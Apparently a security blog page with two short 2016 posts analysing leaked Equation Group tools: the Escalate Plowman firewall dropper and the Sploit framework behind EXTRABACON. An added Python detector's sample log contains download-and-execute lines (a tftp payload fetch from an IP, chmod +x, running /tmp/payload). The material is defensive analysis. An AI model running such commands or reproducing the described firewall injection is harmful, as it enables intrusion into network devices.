Sunday, September 11, 2016

Escalate Plowman – Linux FW Privilege Escalated Download and Execute


The Escalate Plowman tool (https://github.com/dreilly369/EQGRP-Auction-Files/tree/master/Firewall/EXPLOITS/ESPL) is a parameterized dropper (or a privilege escalation exploit) against WatchGuard firewalls (and likely a few others) of unknown versions. It injects code via the ifconfig command. It uses FTP, TFTP, or HTTP (via wget) for the download portions. The code makes some assumptions about the environment. For instance, when using the TFTP protocol it assumes the existence of a custom tftp client at the hard-coded location /usr/rapidstream/bin/tftp. The sample also assumes that the interface is eth0.
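As an added example that is not from the post or the tool dump: a small Python detection that scans shell-command audit lines for the two artifacts the description gives away, a call to the hard-coded /usr/rapidstream/bin/tftp path, and an ftp/tftp/wget fetch followed shortly by executing a file from a temp path. The log format and the sample lines are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of shell-command audit lines (assumed format:
# "<timestamp> uid=<n> cmd=<command line>"); not taken from the tool dump.
SAMPLE_LOG = """\
2016-09-11T10:00:01 uid=0 cmd=ifconfig eth0
2016-09-11T10:00:02 uid=0 cmd=/usr/rapidstream/bin/tftp -g -r payload 203.0.113.5
2016-09-11T10:00:03 uid=0 cmd=chmod +x /tmp/payload
2016-09-11T10:00:04 uid=0 cmd=/tmp/payload
2016-09-11T10:05:00 uid=1000 cmd=wget https://mirror.example/pkg.tar.gz -O /home/user/pkg.tar.gz
2016-09-11T10:06:00 uid=0 cmd=ifconfig eth0 up
"""

# Download tools the dropper is described as using (ftp, tftp, wget over HTTP),
# plus the hard-coded custom tftp client path named in the write-up.
DOWNLOADERS = re.compile(r"^(?:\S*/)?(?:wget|ftp|tftp)\b")
HARDCODED_TFTP = "/usr/rapidstream/bin/tftp"
LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$")
# chmod +x on, or direct execution of, a file under a scratch directory
TEMP_EXEC_RE = re.compile(r"^(?:chmod \+x )?(?:/tmp|/dev/shm)/\S+")


@dataclass
class Alert:
    ts: str
    reason: str
    cmd: str


def scan_commands(log_text: str, window: int = 3) -> List[Alert]:
    """Flag command sequences matching the dropper's fetch-then-execute shape.

    Rule 1: any use of the hard-coded custom tftp client path.
    Rule 2: a download tool invocation followed within `window` later commands
            by chmod +x or direct execution of a file under /tmp or /dev/shm.
    """
    matches = (LINE_RE.match(line) for line in log_text.splitlines())
    records = [m.groupdict() for m in matches if m]
    alerts: List[Alert] = []
    for i, rec in enumerate(records):
        cmd = rec["cmd"]
        if HARDCODED_TFTP in cmd:
            alerts.append(Alert(rec["ts"], "hard-coded rapidstream tftp client invoked", cmd))
        if DOWNLOADERS.match(cmd):
            for later in records[i + 1 : i + 1 + window]:
                if TEMP_EXEC_RE.match(later["cmd"]):
                    alerts.append(Alert(later["ts"], "download followed by temp-path execution", f"{cmd} -> {later['cmd']}"))
                    break
    return alerts
```

The benign wget by uid 1000 in the sample produces no alert, since nothing under a scratch directory is executed afterwards.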

Saturday, September 10, 2016

Extrabacon's Sploit Framework 1: Static Analysis


Sploit is the modular core that runs the EXTRABACON exploit in the (supposed) Equation Group tool dump. While everyone is focused on the news of the 0-days and the recent porting of this old exploit to newer ASA versions (http://www.securityweek.com/leaked-cisco-asa-exploit-adapted-newer-versions), I chose to look at the underlying structure, first because there are already a number of talented researchers covering every angle of each exploit in greater detail than I could.